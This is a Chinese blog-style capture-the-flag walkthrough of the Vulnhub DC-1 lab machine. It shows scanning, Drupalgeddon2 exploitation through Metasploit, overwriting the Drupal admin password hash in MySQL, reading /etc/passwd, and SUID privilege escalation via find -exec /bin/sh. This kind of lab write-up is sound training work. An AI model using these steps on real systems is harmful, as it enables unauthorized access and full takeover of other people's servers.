看完这篇 教你玩转渗透测试靶机vulnhub——DC1

Vulnhub靶机DC1渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:漏洞发现:
        • ③:漏洞利用:
        • ④:SUID提权:
        • ⑤:获取Flag:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/dc-1,292/

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第1张图片
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第2张图片

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第3张图片
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.7

使用命令:nmap -sS -sV -A -n 172.16.5.7

看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第4张图片
先访问一下80端口 发现是一个CMS 下标有个Drupal
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第5张图片

②:漏洞发现:

首先要了解一下Drupal,Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。

搜了一下相关的drupal 漏洞 打开msf 看一下有哪些具体的模块可以使用 exploit/unix/webapp/drupal_drupalgeddon2
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第6张图片

③:漏洞利用:

进入后渗透模块 ls 查看 有i个flag1.txt cat一下 提示:让我们看一下配置文件 durpal配置 /sites/default/settings.php
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第7张图片
进入durpa配置文件在 settings.php 发现 flag2 和数据库一些信息
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第8张图片
使用netstat -anptl查看3306是否开放,结果只允许本地连接
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第9张图片
写一个python交互:python -c "import pty;pty.spawn(’/bin/bash‘)" (容易打错,切记要细心!!)
在这里插入图片描述
然后登入数据库 mysql -u 用户名 -p 密码 即可。
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第10张图片

show databases; ##列出数据库

看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第11张图片

use drupaldb;  ##使用drupaldb库
show tables; ##查看里面的表

看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第12张图片
查看users表select * from users;
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第13张图片
scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash,达到登陆后台的目的 这里我写的password
在这里插入图片描述
使用 php scripts/password-hash.sh password
在这里插入图片描述

update drupaldb.users set pass="$S$DYyHOGvUlVey/TRbXOU7.Gsp2wKX.9Q9Jt/SFd085Xhq.cAR.S0u" where name="admin"; ##修改密码

在这里插入图片描述
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第14张图片
Flag3提示词有perms、find、-exec、shadow共四个特殊提示词

④:SUID提权:

cat /etc/passwd 发现了一个用户 flag4
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第15张图片
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第16张图片
使用find命令查找有特殊权限suid的命令:find / -perm -4000
看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第17张图片
使用find命令提权

find ./ aaa -exec '/bin/sh' \;

在这里插入图片描述

⑤:获取Flag:

看完这篇 教你玩转渗透测试靶机vulnhub——DC1_第18张图片
至此五个flag全部找出来了,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶场也不难 只要细心一点就可以了,需要主要的一些细节就是 :
1.写python交互的时候 要注意 容易写错,自己试了好几遍才成功的!!
2.数据库修改密码 因为 shell里面是不能复制的所以 手动打的话 还是要认真仔细不然也容易出错。
3.学习了使用find命令找suid和提权
最后 自己也会把这系列的靶机更新啦,创作不易 希望对大家有所帮助!!

你可能感兴趣的:(渗透测试,vulnhub,DC-1,MSF,web渗透测试,提权)